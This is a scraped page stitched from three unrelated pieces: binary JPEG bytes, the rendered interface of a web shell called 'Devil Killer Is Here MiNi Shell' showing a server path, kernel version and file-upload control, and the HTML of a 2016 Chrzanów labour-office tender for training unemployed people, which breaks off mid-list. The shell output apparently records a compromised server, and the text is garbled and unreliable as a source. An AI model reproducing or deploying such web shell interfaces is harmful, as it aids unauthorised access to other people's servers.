JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160412/84908-N-2016.html

<p class="kh_header"><b>Chrzanów: Przedmiotem zamówienia jest przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.</b><br>
<b>Numer ogłoszenia: 84908 - 2016; data zamieszczenia: 12.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie w specjalnościach: 
1. Pierwsze kroki w biznesie - czyli organizacja i prowadzenie własnej firmy dla 88 osób  - Część I zamówienia
2. Monter nawierzchni drogowych - brukarz dla 15 osób - Część II zamówienia 
3. Uprawnienia elektryczne SEP do 1 kV dla 10 osób - Część III zamówienia 
4. Kelner - barman z językiem angielskim dla 10 osób - Część IV zamówienia
5. Obsługa kasy fiskalnej dla 24 osób - Część V zamówienia
6. Obsługa wózka widłowego dla 20 osób - Część VI zamówienia
7. Spawanie blach i rur spoinami pachwinowymi metodami Mag (135) i Tig (141) dla 15 osób - Część VII zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. 2014 poz. 781 ) - dotyczy wszystkich części zamówienia.
b)Dokument potwierdzający zatwierdzenie programu do prowadzenia szkoleń w zakresie kierowców wózków jezdniowych przez jednostkę organizacyjną wyznaczoną przez ministra właściwego ds. gospodarki zgodnie  z  Rozporządzeniem  Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym 
(Dz. U nr 70, poz. 650 z późn. zm.)  - dotyczy części szóstej zamówienia.
c)Atest Instytutu Spawalnictwa w Gliwicach uprawniający do szkolenia i egzaminowania spawaczy  - okres ważności atestu nie może być krótszy niż termin realizacji szkolenia - dotyczy części siódmej zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w okresie ostatnich trzech lat (dla min. 10 osób)  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia (załącznik nr 5 do SIWZ) - dotyczy wszystkich części zamówienia. W przypadku rozbieżności pomiędzy nazwą szkolenia wskazaną w SIWZ a nazwą wykazaną w załączniku nr 5 w ocenie doświadczenia będą uwzględnione te szkolenia, w których Wykonawca wykaże, że program tematyczny zrealizowanych przez niego  zamówień obejmował  co najmniej 70% wymaganego przez Zamawiającego minimum programowego wskazanego w załączniku nr 1A do SIWZ II część szczegółowa - dotyczy wszystkich części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami umożliwiającymi realizację szkolenia (załącznik nr  10 do  SIWZ) - dotyczy wszystkich części zamówienia. 
Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia  i materiały dostosowane do właściwej części zamówienia. Każdy z uczestników szkolenia powinien mieć indywidualny  dostęp do sprzętu i materiałów wykorzystywanych przy realizacji danego szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował osobą lub osobami, które posiadają adekwatne do zakresu danego szkolenia kwalifikacje, wykształcenie, doświadczenie zawodowe ( załącznik nr 11 do  SIWZ) - dotyczy wszystkich części zamówienia. 
Dla pierwszej  części zamówienia przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe oraz uprawnienia pedagogiczne i co najmniej dwuletnie doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem  zamówienia. 
W przypadku pozostałych części zamówienia przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe oraz uprawnienia pedagogiczne i co najmniej dwuletnie doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem  zamówienia lub wykształcenie  średnie zawodowe i co najmniej czteroletnie doświadczenie w prowadzeniu szkoleń o tematyce zgodnej  z przedmiotem  zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga przedłożenia dokumentów do oceny w/w warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na  ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 9 do SIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną   do podpisania oferty - dotyczy wszystkich części zamówienia
2. Oświadczenie  Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych  w  art. 22 ust. 1 ustawy PZP, według wzoru na Załączniku nr 3 do SIWZ (oryginał) - dotyczy wszystkich części zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4 - Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć:
a) kadry wykonującej przedmiot  zamówienia z przyczyn losowych (za zgodą Zamawiającego),
b) programu szkolenia jeśli nastąpiła zmiana przepisów prawnych
c) terminu przeprowadzenia szkolenia  
d) zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
e) zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
f) zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy określonego  w  § 5  umowy szkoleniowej oraz tego że  plan nauczania będzie obejmował przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy  Urząd  Pracy w Chrzanowie
ul. Słowackiego 8
32-500  Chrzanów
pokój 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2016 godzina 08:30, miejsce: Powiatowy Urząd Pracy ul. Słowackiego 8, 
32-500 Chrzanów,  pokój nr 301 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy w powiecie chrzanowskim(II) realizowany w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego; Oś priorytetowa 8 Rynek pracy, Działanie 8.1 Aktywizacja zawodowa - projekty Powiatowych Urzędów Pracy, współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Projekt: Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim (II), realizowany w ramach Programu Operacyjnego Wiedza Edukacja Rozwój, Oś priorytetowa I Osoby młode na rynku pracy, Poddziałanie 1.1.2 Wsparcie udzielane z Inicjatywy na rzecz zatrudnienia ludzi młodych, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pierwsze kroki w biznesie - czyli organizacja i prowadzenie własnej firmy dla 88 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  88 osób bezrobotnych (podzielonych na 5 grup) w specjalności: Pierwsze kroki w biznesie - czyli organizacja i prowadzenie własnej firmy w ramach środków Funduszu Pracy.
Liczba osób w poszczególnych grupach może ulec zmianie pod warunkiem, iż  szkoleniem zostanie objętych łącznie 88 osób.  O ewentualnej zmianie liczby osób w poszczególnych grupach Wykonawca zostanie poinformowany nie później niż na 7 dni przed rozpoczęciem szkolenia
2.Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem  wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 w  załączniku nr 7 do SIWZ.  
3. Program szkolenia powinien obejmować 30  godzin dydaktycznych i zawierać następujące moduły:
a.Czynności związane z rozpoczynaniem działalności gospodarczej 
b.Elementy prawa gospodarczego 
c.System podatkowy w Polsce i formy ewidencji podatkowej 
d.Podstawy marketingu
e.Podstawy negocjacji 
f.Formy wsparcia dla  przedsiębiorców i osób rozpoczynających działalność gospodarczą
g.Prowadzenie rozliczeń z ZUS
h.Analiza sytuacyjna przedsiębiorstwa
Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.
Program powinien zawierać wskazane powyżej  minimum programowe, które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie może przekroczyć 30 godzin . 
4. Sposób organizacji zajęć praktycznych: 
Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 
5.Czas trwania: nie dłużej niż 5 kolejnych dni roboczych
6. Termin realizacji szkolenia: 
I grupa  - czerwiec 2016r. 
II grupa - czerwiec 2016r. 
III grupa - sierpień  2016r.
IV  grupa - październik 2016r.  
V grupa -  październik 2016r. 
7.  Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma:
a.Zaświadczenie wystawione na papierze firmowym (przekazanym przez Zamawiającego Wykonawcy po podpisaniu umowy) zgodnie  z wymogami określonymi w § 71 ust. 4  Rozporządzenie Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków  oraz trybu i sposobów  prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz  667),
b.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla 15 osób bezrobotnych w specjalności: Monter nawierzchni drogowych - Brukarz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla 15 osób bezrobotnych w specjalności: Monter nawierzchni drogowych - Brukarz.  
- dla 8 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego ,Program Operacyjny Wiedza Edukacja Rozwój, Projektu: Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim (II)
- 7 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego Regionalnego Programu Operacyjnego, Projektu: Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy w powiecie chrzanowskim ( II). 
2.  Miejsce organizacji szkolenia:  powiat chrzanowski. 
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem  wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 w  załączniku nr 7 do SIWZ.  
Dokładne miejsce odbywania zajęć praktycznych  strony ustalą wspólnie przed podpisaniem umowy.
3. Program szkolenia powinien obejmować  180 godzin dydaktycznych i zawierać następujące moduły:
1.Bezpieczeństwo i higiena pracy przy wykonywaniu robót budowlanych ze szczególnym uwzględnieniem robót brukarskich i drogowych,
2.Materiałoznawstwo
3.Technologia z elementami maszynoznawstwa 
4.Podstawy rysunku technicznego 
5.Maszyny, sprzęt i narzędzia do robót ziemnych
6.Zasady postępowania w razie wypadku w czasie pracy i w sytuacjach zagrożeń, w tym zasady udzielania pierwszej pomocy w razie wypadku
7.Zajęcia praktyczne:
a)Wykonywanie wykopów, skarp i nasypów
b)Wykonanie nawierzchni brukowych z kamieni
c)Wykonanie nawierzchni z kostek i płytek betonowych
W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych do zawodu brukarz, dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.
Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie może przekroczyć 180 godzin . 
4.Sposób organizacji zajęć praktycznych: 
a)W ramach zajęć praktycznych uczestnicy szkolenia mają wykonać zakres prac związanych z wyłożeniem nawierzchni o powierzchni min. 150 m2  zgodnie z technologią prac brukarskich, która powinna obejmować :
1)przygotowanie podłoża do korytowania 
2)korytowanie podłoża
3)wykonanie podbudowy wraz z zagęszczeniem
4)ułożenie obrzeży
